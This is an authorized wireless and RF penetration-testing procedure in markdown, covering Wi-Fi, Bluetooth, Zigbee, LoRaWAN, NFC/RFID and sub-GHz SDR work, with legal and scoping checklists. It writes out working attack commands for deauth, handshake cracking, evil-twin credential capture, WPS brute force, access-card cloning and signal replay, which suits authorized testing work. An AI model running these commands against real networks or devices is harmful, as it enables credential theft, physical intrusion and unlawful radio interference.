Skip to content

sop-wireless-rf-pentest.md

Latest commit

 

History

History
759 lines (573 loc) · 45.7 KB

sop-wireless-rf-pentest.md

File metadata and controls

759 lines (573 loc) · 45.7 KB
type sop
title Wireless & RF Pentesting (Authorized)
description Authorized wireless and software-defined-radio testing across Wi-Fi (WPA2/WPA3/OWE), Bluetooth Classic/BLE, 802.15.4 (Zigbee/Thread/Matter), LoRa/LoRaWAN, NFC/RFID, and sub-GHz with HackRF / RTL-SDR / LimeSDR.
created 2026-04-26
updated 2026-04-26
template_version 2026-04-26
tags
sop
pentest
wireless
rf
sdr
wifi
bluetooth
zigbee
lora
nfc

Wireless & RF Pentesting (Authorized)

Authorized environments only. Wireless and RF testing crosses statutory radio-emission lines (FCC Part 15 / CE / national equivalents) before a packet leaves the antenna. Operate on hardware/spectrum you own or have written authorization to exercise. RX-only enumeration of public bands is generally lawful; transmit, replay, deauth, and active jamming have hard legal limits in nearly every jurisdiction. See [[sop-legal-ethics|Legal & Ethics]].

Table of Contents

  1. Overview
  2. Pre-Engagement & Authorization
  3. Wi-Fi (IEEE 802.11)
  4. Bluetooth Classic & BLE
  5. 802.15.4 — Zigbee, Thread, Matter
  6. Z-Wave
  7. LoRa & LoRaWAN
  8. NFC & RFID
  9. Sub-GHz & ISM-Band Devices
  10. Software-Defined Radio Fundamentals
  11. Common Vulnerabilities
  12. Evidence Collection
  13. Reporting
  14. Tools Reference
  15. Reference Resources
  16. Common Pitfalls
  17. Legal & Ethical Considerations
  18. Related SOPs

Overview

What is Wireless / RF Pentesting?

Authorized assessment of radio-frequency attack surfaces — Wi-Fi, Bluetooth, 802.15.4 mesh networks, LoRa, NFC/RFID, and arbitrary sub-GHz ISM-band devices. The discipline spans:

  • Protocol-layer testing — authentication, key-establishment, replay/relay resistance, downgrade attacks
  • Implementation-layer testing — vendor stack bugs, fuzzing, vendor-specific extensions
  • Hardware-layer testing — radio firmware (cross-linked to [[sop-firmware-reverse-engineering|Firmware RE]]), side channels, glitch injection on RF SoCs
  • Operational testing — coverage / signal leakage / rogue AP detection, OPSEC of operator infrastructure

Threat Model

Attacker capability Typical band Required gear
Passive eavesdropper (RX-only) Wi-Fi, BLE adv, LoRa, sub-GHz Monitor-mode NIC, RTL-SDR / HackRF
Active probe / replay All of the above TX-capable adapter, HackRF, Flipper Zero
Mesh / handshake attacker WPA2/3, BLE pairing, Zigbee join Hostapd-WPE, mdk4, btlejack, KillerBee + ApiMote
Local-physical attacker NFC, RFID 125 kHz / 13.56 MHz Proxmark3, ChameleonMini
Long-range / SDR attacker Anything within antenna gain LimeSDR / BladeRF / USRP, GNU Radio toolchain

Field-rotation cadence

Wi-Fi (Wi-Fi 6/6E/7 rollout, WPA3 SAE-PT changes), Matter / Thread adoption, and Bluetooth core-spec revisions move quarterly. SDR hardware (HackRF, RTL-SDR, LimeSDR families) and the GNU Radio toolchain are slower-rotating. NFC/RFID and 125-kHz prox-card tradecraft is largely stable. Re-verify [verify 2026-04-26] markers and tool repos at the start of each engagement.

Pre-Engagement & Authorization

Wireless/RF testing transmits into shared spectrum and may interact with devices not owned by the customer (neighboring tenants' Wi-Fi, public BLE beacons in the building, IoT meters). Without written scope and a controlled test environment (Faraday cage, dedicated channel, sacrificial gear), a single deauth flood or PMKID capture session crosses into FCC Part 15 / Wireless Telegraphy Act 2006 / CFAA / Computer Misuse Act / EU Cybercrime Directive 2013/40/EU territory — see [[sop-legal-ethics|Legal & Ethics]].

Authorization Checklist

  • Signed Rules of Engagement enumerates bands, channels, and modulations in scope. "Wi-Fi pentest" without a channel/SSID/BSSID list is too vague — collect MAC-address allow-lists, SSIDs, and frequency ranges in writing.
  • Active vs. passive explicitly scoped. RX-only enumeration (passive sniffing of public broadcasts, beacon collection, advertising-channel BLE scan) has very different legal weight than TX (deauth, replay, EAPOL injection, jam) — separate authorization for each.
  • Geographic / RF boundary defined. Faraday cage, RF-shielded room, or low-power test bench preferred for any TX work; if testing on a customer site, document the radius of intended emission and the operator's procedure if a non-target device responds.
  • Adjacent-tenant / neighbor risk acknowledged. Building-wide Wi-Fi deauth, BLE mass-disconnect, or Zigbee channel jamming inevitably affects other tenants — RoE must call out who has been notified and how complaints are routed.
  • Regulatory authority acknowledged in writing: FCC (US), Ofcom (UK), ARCEP (FR), BNetzA (DE), ANATEL (BR), MIC (JP), national telecoms regulator equivalent. Some bands (cellular, public-safety, aviation) require licensed-operator status; these are out of scope for typical pentest engagements unless the customer holds the license.
  • Hardware import/export controls reviewed if shipping SDR gear across borders — HackRF / LimeSDR / BladeRF / USRP families have ECCN classifications and may require export licenses for some destinations [verify 2026-04-26].
  • Frequency monitoring — if any test step involves transmission in a band that may be in active use by emergency services, aviation, or maritime (sub-GHz, GMRS in US, marine VHF), do not transmit. RX-only.
  • Sacrificial / lab gear identified — testing uses dedicated SSIDs, dedicated APs, sacrificial Bluetooth dongles, lab Zigbee coordinators. Operator's daily-driver phone and personal devices stay powered down or out of range during TX work.
  • Blue-team coordination confirmed with whoever runs the wireless IDS (Cisco WIPS, Aruba RFProtect, ExtremeWireless AirDefense), the SIEM, and the SOC. Names plus 24/7 contacts captured. Emergency-stop signal agreed.

Lab Environment Requirements

  • RF-shielded enclosure for any TX testing that requires repeatable conditions or that should not leak — desktop Faraday tents (Ramsey STE-3000, 3M shielding bag) are imperfect but adequate for low-power devices; full RF chambers are overkill for most pentest work [verify 2026-04-26].
  • Dedicated lab APs — ASUS RT-AX86U, TP-Link AX73, MikroTik hAP ax² and similar consumer hardware reproduce most real-world misconfigurations cheaply; pair with hostapd-WPE for AP-side spoofing rehearsal.
  • Lab BLE peripherals — nRF52-DK, nRF52840 dongle, ESP32-C3 / ESP32-S3, Raspberry Pi Pico W. Avoid testing against the operator's wearables.
  • Lab Zigbee/Thread/Matter — Silicon Labs EFR32MG24 dev kit, Nordic nRF52840 dongle (Zigbee + Thread), Texas Instruments CC2538/CC1352 launchpads.
  • SDR rehearsal — HackRF One + RTL-SDR + lab SMA antenna for any GNU Radio flowgraph that will eventually run in customer-facing scope.

Disclosure-Ready Posture

Stand up the evidence pipeline before the first probe-request capture. Capture every RF observation as PCAP with radiotap headers (Wi-Fi), HCI snoop (Bluetooth), or SDR baseband recording (.cfile / .sigmf) at the moment of test — chain-of-custody per [[sop-collection-log|Collection Log]] (UTC timestamps, source antenna, operator handle, SHA-256 of each artifact). Handshake captures, BLE pairing exchanges, and recovered keys are credentials in the evidentiary sense; encrypt at rest, store separately from the report deliverable, and schedule destruction in the engagement letter — OPSEC framing per [[sop-opsec-plan|OPSEC]]. SDR recordings are large (1 Msps × 2 channels × 8 bits ≈ 16 MB/s); plan storage and hash verification accordingly. Defang any IOC that ships in the final write-up (redact MAC addresses to OUI-only or vendor-prefix-only) and route the hand-off through [[sop-reporting-packaging-disclosure|Reporting & Disclosure]].

Wi-Fi (IEEE 802.11)

Standards & Generations Quick Reference

Marketing name IEEE Year Bands Notes
Wi-Fi 4 802.11n 2009 2.4 / 5 GHz MIMO introduction
Wi-Fi 5 802.11ac 2013 5 GHz Wave 2 added MU-MIMO
Wi-Fi 6 802.11ax 2019 2.4 / 5 GHz OFDMA, target wake time
Wi-Fi 6E 802.11ax 2020 + 6 GHz 6 GHz band requires WPA3 + PMF [verify 2026-04-26]
Wi-Fi 7 802.11be 2024 2.4 / 5 / 6 GHz Multi-Link Operation, 320 MHz channels [verify 2026-04-26]

Authentication & Key-Establishment Modes

  • Open — no auth; deprecated.
  • WEP — broken since 2001 (Fluhrer-Mantin-Shamir); never deploy. Treat as "open" if encountered.
  • WPA / WPA2-Personal (PSK) — 4-way handshake derives PTK from PSK + ANonce + SNonce + MAC pair. Capture the handshake (or PMKID — see below) and offline-crack.
  • WPA2-Enterprise (802.1X / EAP) — RADIUS-backed. Common EAP methods: EAP-TLS (mutual cert, strongest), PEAP/MSCHAPv2 (weak server-cert validation common, rogue-AP attacks effective), EAP-TTLS (similar exposure to PEAP), EAP-PWD.
  • WPA3-Personal (SAE / Dragonfly) — replaces PSK 4-way handshake with Simultaneous Authentication of Equals; resistant to offline dictionary attack on the handshake itself but vulnerable to side-channel timing variants (Dragonblood: CVE-2019-9494/9495/9496/9497/9498/9499 [verify 2026-04-26]) and to downgrade if WPA2 transition mode is enabled.
  • WPA3-Enterprise — same EAP methods as WPA2-Enterprise plus 192-bit Suite-B option.
  • OWE (Opportunistic Wireless Encryption) — RFC 8110; replaces "Open" with unauthenticated Diffie-Hellman; protects against passive eavesdropping on truly open networks. No mutual authentication.
  • PMF (Protected Management Frames, 802.11w) — required in WPA3, optional in WPA2. PMF blocks classic deauth/disassoc attacks on associated stations; check beacon Capability Information element.

Reconnaissance (Passive, RX-Only)

# Identify monitor-mode-capable interface (mt7612u, mt7921u, rt3070, ar9271, rtl8812au are common hits;
# check current support: `iw list` shows "monitor" under Supported interface modes)
iw dev
iw list | grep -A8 'Supported interface modes' | head -20

# Enable monitor mode on wlan0 — preferred via airmon-ng or iw + nmcli stop
sudo airmon-ng check kill   # disable NetworkManager / wpa_supplicant interference
sudo airmon-ng start wlan0  # creates wlan0mon

# Survey on 2.4 / 5 / 6 GHz (6 GHz requires Wi-Fi 6E hardware + recent kernel + regdom set to a 6E-allowed region)
sudo iw reg set US           # or appropriate domain
sudo airodump-ng wlan0mon -b abg --band a,b,g  # 2.4 + 5 GHz
sudo airodump-ng wlan0mon --band 6              # 6 GHz (Wi-Fi 6E)

# Kismet — long-running surveys with GPS, channel hopping, plugin ecosystem
# https://www.kismetwireless.net/
sudo kismet -c wlan0mon

# wifite — automated wrapper around aircrack-ng / hcxdumptool / hashcat
# https://github.com/derv82/wifite2
sudo wifite --kill --pmkid --no-wps  # passive PMKID first, no active WPS pin attempts

Handshake / PMKID Capture

# Channel-locked capture with airodump
sudo airodump-ng wlan0mon -c <channel> --bssid <BSSID> -w capture

# Targeted deauth (PMF must NOT be enforced; check beacon capabilities)
sudo aireplay-ng --deauth 5 -a <BSSID> -c <client-MAC> wlan0mon

# PMKID capture — no client interaction needed when AP includes PMKID in 1st EAPOL message (Steube, 2018)
# https://github.com/ZerBea/hcxdumptool
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=15

# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 -E essid.txt pmkid.pcapng

# Crack WPA/WPA2 PSK (4-way handshake or PMKID)
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule

# WPA3 SAE — captured handshake is hash mode 22000 with different attack profile (no offline dict attack
# on uncompromised SAE; targets are downgrade-to-WPA2 transition mode + Dragonblood timing leaks)

Rogue AP / Evil Twin

# hostapd-WPE — modified hostapd with EAP credential capture
# https://github.com/OpenSecurityResearch/hostapd-wpe
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# eaphammer — automation around hostapd-wpe + karma + GTC downgrade
# https://github.com/s0lst1c3/eaphammer
sudo eaphammer --bssid <bssid> --essid <victim-ssid> --channel 6 --auth wpa-eap --creds

# Wi-Fi Pineapple (Hak5 commercial) — pre-built eviltwin/karma platform
# https://shop.hak5.org/products/wifi-pineapple

# ESP32 Marauder (open-source, ESP32 firmware)
# https://github.com/justcallmekoko/ESP32Marauder

Enterprise (802.1X / EAP) Attack Path

  1. Stand up rogue AP with same SSID, mismatched but plausible cert (or use real cert if leaked).
  2. Force client to associate (deauth + signal-strength preference, or wait for roaming).
  3. Capture EAP exchange with hostapd-WPE — output for PEAP/MSCHAPv2 is hash mode 5500 (NetNTLMv1) / 27200 / 25400 (different EAP modes).
  4. Crack offline with hashcat or wait — many MSCHAPv2 captures crack in seconds with a leaked DES-key approach (asleap historically).

Mitigation to test for:

  • Server certificate validation enforced (CA pinning, no "trust any cert from any RADIUS").
  • EAP-TLS (mutual cert) instead of PEAP/MSCHAPv2.
  • PMF required, not optional.

WPS

  • WPS PIN brute (Reaver / Bully) — most modern APs lock WPS after N failed attempts; some still don't [verify 2026-04-26].
  • Pixie Dust (Dominique Bongard, 2014) — offline attack against weak WPS PRNG implementations (Ralink, Realtek, Broadcom).
  • Recommend disable WPS entirely; verify in beacon capability.
# Reaver
sudo reaver -i wlan0mon -b <BSSID> -vv -K  # -K = pixiedust

# Bully (Reaver successor / parallel implementation)
sudo bully wlan0mon -b <BSSID> -d  # detect WPS lock state

Bluetooth Classic & BLE

Spec Reference & Pairing Modes

Bluetooth Core Spec is currently 5.4 (Feb 2023); 5.3 (2021) added LE Channel Sounding precursors and Encrypted Advertising Data; BLE-only stacks dominate IoT [verify 2026-04-26].

Bluetooth Classic (BR/EDR) pairing modes:

  • Legacy Pairing (pre-2.1) — PIN-based, broken by Shaked-Wool 2005. Should not exist on modern devices.
  • Secure Simple Pairing (SSP) — 2.1+, four association models: Just Works, Numeric Comparison, Passkey Entry, Out-of-Band.
  • Secure Connections (4.1+) — adds FIPS-approved P-256 ECDH; mandatory in 4.2+ Secure Connections Only mode.

BLE pairing modes (LE Legacy and LE Secure Connections):

  • LE Legacy — uses TK (temp key); offline-crackable if Just Works or 6-digit Passkey captured (crackle).
  • LE Secure Connections (4.2+) — P-256 ECDH; immune to crackle-style offline attacks.

Notable RF-Layer Attacks (Reference, Not How-To)

  • KNOB (CVE-2019-9506) — entropy-downgrade in BR/EDR key negotiation; mitigated in 5.1.
  • BIAS (CVE-2020-10135) — impersonation via fall-back to Legacy Authentication.
  • BLURtooth (CVE-2020-15802) — Cross-Transport Key Derivation overwrite.
  • BLESA (Carnegie Mellon, 2020) — reconnection authentication bypass on BLE LL.
  • BlueBorne (Armis, 2017, CVE-2017-1000251 et al.) — Linux/Android/iOS RCE via BNEP / SDP. Patched in mainline; legacy embedded devices still exposed.
  • BrakTooth (Singapore U Tech & Design, 2021) — 16+ CVEs in BR/EDR stacks.

Patch-state of these CVEs varies wildly across vendors; firmware-RE the target stack to confirm rather than trusting marketing.

Reconnaissance (RX-Only)

# bluetoothctl — userspace, BlueZ-backed
bluetoothctl
> power on
> scan on              # active scan; passive option below for RX-only

# hcitool — legacy but still useful for inquiry
sudo hcitool scan      # BR/EDR inquiry
sudo hcitool lescan    # BLE advertising scan (active)
sudo hcitool lescan --passive  # purely RX

# btmgmt for advanced setup (BlueZ 5.x)
sudo btmgmt --index 0 power on
sudo btmgmt --index 0 le on

# Wireshark — HCI snoop log capture (host-side)
sudo btmon -w bluetooth.btsnoop  # captures HCI events; adapter-dependent visibility into LL/PHY

# Sniffle (NCC Group / Sultan Qasim Khan) — TI CC1352 / CC26x2-based BLE 5 sniffer
# https://github.com/nccgroup/Sniffle
sniff_receiver.py -l                # list adapters
sniff_receiver.py -c 37              # advertising channel 37

# nRF Sniffer for Bluetooth LE (Nordic + Wireshark plugin) — nRF52840 dongle
# https://www.nordicsemi.com/Products/Development-tools/nrf-sniffer-for-bluetooth-le

GATT Enumeration

# Enumerate services / characteristics on a BLE peripheral
bluetoothctl
> connect <addr>
> menu gatt
> list-attributes
> read <attr-handle>
> write <attr-handle> 0x...

# gatttool (deprecated but functional)
sudo gatttool -b <addr> -I
> connect
> primary
> characteristics

# bleak (Python, cross-platform — Linux/macOS/Windows)
# https://github.com/hbldh/bleak
python -m bleak.discover

BLE Pairing / Encryption Attack Tooling

# btlejack (Damien Cauquil) — BLE 4.x sniffing + connection hijack
# https://github.com/virtualabs/btlejack
btlejack -d /dev/ttyACM0 -s          # passive scan
btlejack -d /dev/ttyACM0 -f <ap-addr> # follow connection

# crackle — LE Legacy Pairing TK recovery (Just Works / 6-digit passkey)
# https://github.com/mikeryan/crackle
crackle -i pairing.pcap

# mirage — BLE/Zigbee/SPI/UART unified attack framework (RCSL)
# https://github.com/RCayre/mirage
mirage ble_master TARGET=<addr>

802.15.4 — Zigbee, Thread, Matter

Standards Map

  • IEEE 802.15.4 — PHY/MAC. 2.4 GHz channels 11-26, 868/915 MHz sub-GHz channels.
  • Zigbee 3.0 — application layer over 802.15.4. Touchlink commissioning historically weak (Zllbruteforce / Z-Shave 2017 [verify 2026-04-26]).
  • Zigbee Green Power (ZGP) — energy-harvesting one-way frames; replay-vulnerable if not signed.
  • Thread (Thread Group, 2014+) — IPv6 mesh over 802.15.4 with DTLS-PSK commissioning; basis for Matter.
  • Matter (Connectivity Standards Alliance, 2022+; was "Project CHIP") — application layer over Wi-Fi or Thread; uses Matter Fabric ID + Node Operational Certificates [verify 2026-04-26].
  • Z-Wave — separate (next section); not 802.15.4.

Tooling

# KillerBee (River Loop Security) — Python framework for 802.15.4 sniffing/injection
# https://github.com/riverloopsec/killerbee
zbid                      # list attached 802.15.4 radios
zbdump -f 15 -w cap.pcap  # capture on channel 15
zbreplay -f 15 -r cap.pcap

# ApiMote / Atmel RZUSBstick / Texas Instruments CC2531 USB stick — common KillerBee-supported radios

# Z3sec / Zigator — newer 802.15.4 / Zigbee research tooling [verify 2026-04-26]

# Wireshark — IEEE 802.15.4 + Zigbee + Thread dissectors built in (configure decryption keys)

Common Findings

  • Default / hard-coded Trust Center Link Key (5A 69 67 42 65 65 41 6C 6C 69 61 6E 63 65 30 39 — "ZigBeeAlliance09") still used during legacy join.
  • Touchlink commissioning enabled with default master key (legacy Zigbee Light Link).
  • Thread commissioner credentials (PSK_c) cached / left enabled past the commissioning window.
  • Matter "Pairing Code" (passcode) reused across deployments rather than per-device unique codes.

Z-Wave

Z-Wave (Silicon Labs / Zensys lineage) operates in regional sub-GHz bands (US: 908.42 MHz, EU: 868.42 MHz [verify 2026-04-26]). Modern Z-Wave (S2 security framework, mandated for Z-Wave-Plus-V2 certified devices since 2017) uses ECDH key exchange (Curve25519) and AES-128 CCM. Legacy S0 had a known issue (EZ-Wave / Z-Shave 2017) where the network key could be intercepted during inclusion if downgrade was permitted [verify 2026-04-26].

# EZ-Wave (Joshua Wright et al.) — SDR-based Z-Wave research toolkit
# https://github.com/cureHsu/EZ-Wave  [verify 2026-04-26 — original repo URL has moved]

# Aeotec Z-Stick / UZB / Zooz — production Z-Wave controllers; useful for legitimate test coordinators
# Use Silicon Labs PC Controller or Z-Way for inclusion-traffic capture in controlled environments

LoRa & LoRaWAN

Standards Map

  • LoRa — Semtech proprietary chirp-spread-spectrum PHY/modulation (sub-GHz, region-specific bands: US 902-928 MHz, EU 863-870 MHz, AS 920-925 MHz).
  • LoRaWAN — LoRa Alliance MAC layer over LoRa PHY. Versions 1.0.x and 1.1 are the field-deployed flavors [verify 2026-04-26]. 1.1 added separate AppSKey / NwkSKey with key-rollover semantics; 1.0.x reuses single AppKey.
  • Activation modes: OTAA (Over-The-Air Activation, dynamic session keys, preferred) vs ABP (Activation By Personalization, hard-coded session keys, weaker — ABP devices that forget frame counters become replay-vulnerable).

Common Findings

  • ABP-only deployments with hard-coded NwkSKey + AppSKey baked into firmware — extract via [[sop-firmware-reverse-engineering|Firmware RE]] and decrypt all uplinks/downlinks.
  • AppKey / network-server credentials reused across an entire fleet (single firmware image, no per-device provisioning).
  • LoRaWAN 1.0.x deployments with frame-counter reset tolerance (default behavior in some network servers) → replay window.
  • LoRa raw (no LoRaWAN MAC) point-to-point links with no authentication — common in hobbyist / Meshtastic setups; not a finding per se but worth flagging in scope.

Tooling

# LoRa-PHY decoding via SDR — gr-lora_sdr (rpp0)
# https://github.com/rpp0/gr-lora
# Demodulates LoRa chirps to bytes; pair with Wireshark LoRaWAN dissector

# gr-lora-sdr (Tapparel, EPFL) — alternative GNU Radio out-of-tree
# https://github.com/tapparelj/gr-lora_sdr  [verify 2026-04-26]

# ChirpStack — open-source LoRaWAN network server; useful for lab infrastructure
# https://www.chirpstack.io/

# Heltec / TTGO / Adafruit Feather LoRa boards — cheap test endpoints

NFC & RFID

Frequency Bands & Common Card Types

Band Standard Typical use Common attack notes
125 kHz EM4100 / HID Prox Legacy access control No crypto; clone with Proxmark3 in seconds
13.56 MHz ISO 14443A MIFARE Classic / DESFire Classic broken (Crapto1 / mfoc / mfcuk); DESFire EV1+ strong if configured right
13.56 MHz ISO 14443B Some ePassports, some access
13.56 MHz ISO 15693 iCLASS / ICODE / library tags iCLASS Standard / SE has known issues; Elite is strong [verify 2026-04-26]
13.56 MHz ISO 18092 (NFC) Smartphones, payment Tokenization on payment side; relay-attack research active

Tooling

# Proxmark3 (Iceman fork — actively maintained)
# https://github.com/RfidResearchGroup/proxmark3
proxmark3 /dev/ttyACM0
> hf 14a info               # 13.56 MHz card identify
> hf mf info                # MIFARE Classic info
> hf mf autopwn             # automated MIFARE attack
> lf hid read               # 125 kHz HID Prox read
> lf hid clone <id>         # clone to T5577 / EM4305 blank

# ChameleonMini / ChameleonUltra — card-emulation device
# https://github.com/emsec/ChameleonMini
# https://github.com/RfidResearchGroup/ChameleonUltra

# Flipper Zero — consumer-grade multi-protocol tool (125 kHz, 13.56 MHz, sub-GHz, IR, BLE, NFC)
# https://flipperzero.one/
# Note: regulatory and policy posture varies — some carriers / countries restrict sub-GHz TX

# libnfc (Linux NFC stack) — for ACR122U and similar PC/SC readers
# https://github.com/nfc-tools/libnfc
nfc-list
mfoc -P 500 -O dump.mfd     # MIFARE Classic key recovery
mfcuk -C -R 0:A -s 250 -S 250 -v 2  # offline-crackable nonces

Findings to Look For

  • Site uses MIFARE Classic 1K / 4K with default keys (A0A1A2A3A4A5, D3F7D3F7D3F7, etc.) or keys recovered via mfoc/mfcuk.
  • Site uses 125 kHz HID Prox with no rolling code → clone-and-replay trivial.
  • iCLASS Legacy / Standard with default master keys (HID published; readers shipped with shared default).
  • Mixed-tier deployments where high-security doors fall back to legacy on read failure.
  • Mobile-credential (HID Mobile Access, Nedap MACE) deployments without device-binding — relay-attack prone.

Sub-GHz & ISM-Band Devices

Garage-door openers, smart thermostats, weather stations, key-fob remotes, alarm sensors, and industrial telemetry frequently use 315 / 433.92 / 868 / 915 MHz with proprietary modulation (ASK/OOK, FSK). Many are unauthenticated or use fixed-code rolling-code algorithms with known weaknesses.

# Universal Radio Hacker (URH) — point-and-click protocol RE for unknown sub-GHz signals
# https://github.com/jopohl/urh
urh

# Inspectrum — visual inspection of `.cfile` / `.cu8` SDR captures
# https://github.com/miek/inspectrum

# rtl_433 — known-protocol decoder for 433/868/915 MHz sensors (weather, tire-pressure, energy meters)
# https://github.com/merbanan/rtl_433
rtl_433 -f 433.92M

# RfCat (Atlas Of Doom) — Yard Stick One firmware framework for sub-GHz TX/RX research
# https://github.com/atlas0fd00m/rfcat

Notable Vulnerability Classes

  • Fixed-code remotes (older garage doors, gate openers) — record once, replay.
  • Rolling-code with weak PRNG (some KeeLoq deployments) — Bohli et al. 2008, Eisenbarth et al. 2008 attacks.
  • Tire-Pressure Monitoring System (TPMS) broadcasts unencrypted on 315/433 MHz — vehicle-tracking research (Ishtiaq Rouf et al., 2010).
  • Smart-meter telemetry (some FCC Part 15 / wMBus C-mode deployments) — encryption optional in older deployments.

Software-Defined Radio Fundamentals

Hardware Comparison

Device Frequency range Bandwidth Half/Full duplex Typical price Notes
RTL-SDR Blog v3 500 kHz - 1.766 GHz (with HF direct sampling) 2.4 Msps RX-only ~$35 Cheapest entry; RX-only
HackRF One 1 MHz - 6 GHz 20 Msps Half-duplex ~$300 Most popular generalist; TX power ~10-15 dBm [verify 2026-04-26]
LimeSDR Mini 2.0 10 MHz - 3.5 GHz 30.72 Msps Full-duplex ~$400 [verify 2026-04-26] Full-duplex enables relay/jam-and-listen
BladeRF 2.0 micro xA4/xA9 47 MHz - 6 GHz 61.44 Msps Full-duplex ~$500-720 FPGA-resourced; xA9 = larger FPGA
USRP B200/B210 70 MHz - 6 GHz up to 56 Msps Full-duplex ~$1100-1700 Ettus / NI; lab-quality
Flipper Zero (sub-GHz module) 300-928 MHz (regional) narrow-band Half-duplex ~$170 Consumer; not a true SDR but useful

Software Stack

# GNU Radio Companion (GRC) — visual flowgraph for SDR signal-processing pipelines
# https://www.gnuradio.org/
gnuradio-companion

# GQRX — visual spectrum analyzer + audio demodulator (RX-only)
# https://gqrx.dk/
gqrx

# SDR++ — modern cross-platform spectrum/demod tool
# https://www.sdrpp.org/

# CubicSDR — alternative spectrum analyzer
# https://cubicsdr.com/

# SigDigger — interactive analyzer for unknown signals
# https://github.com/BatchDrake/SigDigger

# Universal Radio Hacker (URH) — see §Sub-GHz above

Common Workflow

  1. Identify the carrier — wide-band sweep (GQRX, SDR++) to locate the active band.
  2. Capture basebandrtl_sdr / hackrf_transfer / osmocom_fft to .cfile / .cu8.
  3. Inspect — Inspectrum or URH to see modulation, symbol rate, packet structure.
  4. Demodulate — GNU Radio flowgraph (or URH built-in demodulator) to bytes.
  5. Decode — interpret framing; cross-reference known protocol if any (rtl_433 catalog, sigidwiki.com).
  6. Replay / fuzz / craft — only with authorization; TX requires hardware capable of TX (HackRF, LimeSDR, BladeRF, USRP).
# Capture 2 Msps centered at 433.92 MHz with HackRF
hackrf_transfer -r capture.cfile -f 433920000 -s 2000000 -n 20000000

# Capture with RTL-SDR (RX-only; cheaper)
rtl_sdr -f 433920000 -s 2400000 -g 49 capture.cu8

# Replay (HackRF) — only with authorization
hackrf_transfer -t capture.cfile -f 433920000 -s 2000000 -x 47

Common Vulnerabilities

Class Wi-Fi Bluetooth Zigbee/Thread/Matter LoRa NFC/RFID Sub-GHz
Weak / default credentials PSK Pairing PIN Touchlink master key AppKey Default reader keys Fixed code
Downgrade attack WPA3→WPA2 transition Secure→Legacy
Replay Pre-PMF management frames ZGP unsigned LoRaWAN 1.0.x ABP Static UID Fixed-code remote
Rogue device / impersonation Evil twin BIAS Rogue commissioner Rogue gateway Cloned card Cloned remote
Side-channel / impl bug Dragonblood timing KNOB / BLURtooth Vendor stack bugs Crapto1 (MIFARE Classic) KeeLoq weak PRNG
Eavesdrop (passive) Open / WEP / OWE-only Just-Works pairing Unencrypted clusters LoRa unauthenticated Anything unencrypted

Evidence Collection

Wireless evidence is RF observation — capture the raw bytes (PCAP / HCI snoop / SDR baseband) plus the metadata that lets a reviewer reproduce:

  • Channel / frequency / sample rate / antenna at capture time
  • Operator handle, source MAC / BD_ADDR, GPS fix if mobile
  • UTC timestamps from a synced clock (NTP or GPS-disciplined)
  • SHA-256 of every artifact

Hash-and-store per [[sop-collection-log|Collection Log]]. Handshake captures and recovered keys are credentials; encrypt at rest, log access, schedule destruction in the engagement letter.

SDR .cfile / .cu8 baseband files are large (tens of MB per second of capture); plan storage capacity and hash-verification windows accordingly. Always retain the original baseband even if a derived demodulated PCAP exists — re-demodulation may yield new findings.

Reporting

Finding Format

**Title:** <Tech> · <Component> · <Issue> — e.g. "Wi-Fi · WPA2-Enterprise · PEAP/MSCHAPv2 with no server-cert validation"
**Severity:** Critical / High / Medium / Low / Info
**Tech:** Wi-Fi / Bluetooth / Zigbee / Thread / Matter / LoRa / Z-Wave / NFC / RFID / sub-GHz
**Bands / Channels:** <list>
**Affected Devices / SSIDs / BD_ADDRs / DevEUIs:** <list, redacted to OUI/vendor where appropriate>
**Description:** <what the misconfiguration / vuln is>
**Attack Path:** <step-by-step, named primitives, no production-data screenshots>
**Impact:** <confidentiality / integrity / availability + blast radius — e.g. "all corporate-Wi-Fi clients in this floor">
**Evidence:** <PCAP / HCI snoop / SDR cfile path + UTC timestamp + SHA-256>
**Remediation:** <vendor-native fix; config snippet preferred; vendor-doc link>
**References:** <CVE / vendor advisory / CIS Benchmark / IEEE / Bluetooth Core Spec section>

Remediation Priority

  1. WPA2-Enterprise without server-cert validation (Critical — every credential cleanly stealable from any rogue AP within range)
  2. Default / hard-coded keys recoverable from firmware (Critical — fleet-wide compromise)
  3. WPA3 deployed in transition mode where downgrade-to-WPA2 is possible (High)
  4. PMF disabled on enterprise Wi-Fi where deauth attacks against critical clients are feasible (High)
  5. Bluetooth Classic Legacy Pairing or Just-Works on devices that handle sensitive data (High)
  6. Zigbee / Thread / Matter commissioning credentials reused across deployment (High)
  7. LoRaWAN 1.0.x ABP with hard-coded session keys (High)
  8. MIFARE Classic / 125 kHz HID Prox in use for high-value access control (High)
  9. Sub-GHz fixed-code or weak-rolling-code remotes for safety-relevant devices (High)
  10. Open / OWE-only Wi-Fi where TLS-bearing apps assume the network is trusted (Medium)

Tools Reference

Tool Domain Purpose Link
aircrack-ng Wi-Fi Capture, deauth, WEP/WPA crack aircrack-ng.org
hcxdumptool / hcxtools Wi-Fi PMKID + 4-way handshake capture / hashcat conversion github.com/ZerBea/hcxdumptool
hashcat Wi-Fi / general GPU-accelerated password cracking (modes 22000, 5500, 27200) hashcat.net
Kismet Wi-Fi / BLE / Zigbee Long-running survey + plugin ecosystem kismetwireless.net
wifite2 Wi-Fi Automated wrapper around aircrack/hcxtools github.com/derv82/wifite2
hostapd-wpe Wi-Fi Modified hostapd with EAP credential capture github.com/OpenSecurityResearch/hostapd-wpe
eaphammer Wi-Fi Automated 802.1X / EAP attack github.com/s0lst1c3/eaphammer
Reaver / Bully Wi-Fi WPS PIN / Pixie Dust github.com/t6x/reaver-wps-fork-t6x [verify 2026-04-26]
mdk4 Wi-Fi Stress test / deauth / beacon flood (lab-only) github.com/aircrack-ng/mdk4
Wi-Fi Pineapple Wi-Fi Hak5 commercial rogue-AP appliance shop.hak5.org
ESP32 Marauder Wi-Fi / BLE ESP32 firmware for portable WiFi/BLE recon github.com/justcallmekoko/ESP32Marauder
BlueZ (bluetoothctl, btmon) Bluetooth Linux Bluetooth stack + sniffing bluez.org
Sniffle BLE NCC Group BLE 5 sniffer (TI CC1352) github.com/nccgroup/Sniffle
nRF Sniffer BLE Nordic + Wireshark plugin (nRF52840 dongle) nordicsemi.com
btlejack BLE BLE 4.x sniffing + connection hijack github.com/virtualabs/btlejack
crackle BLE LE Legacy TK recovery github.com/mikeryan/crackle
mirage BLE / Zigbee Unified RF attack framework github.com/RCayre/mirage
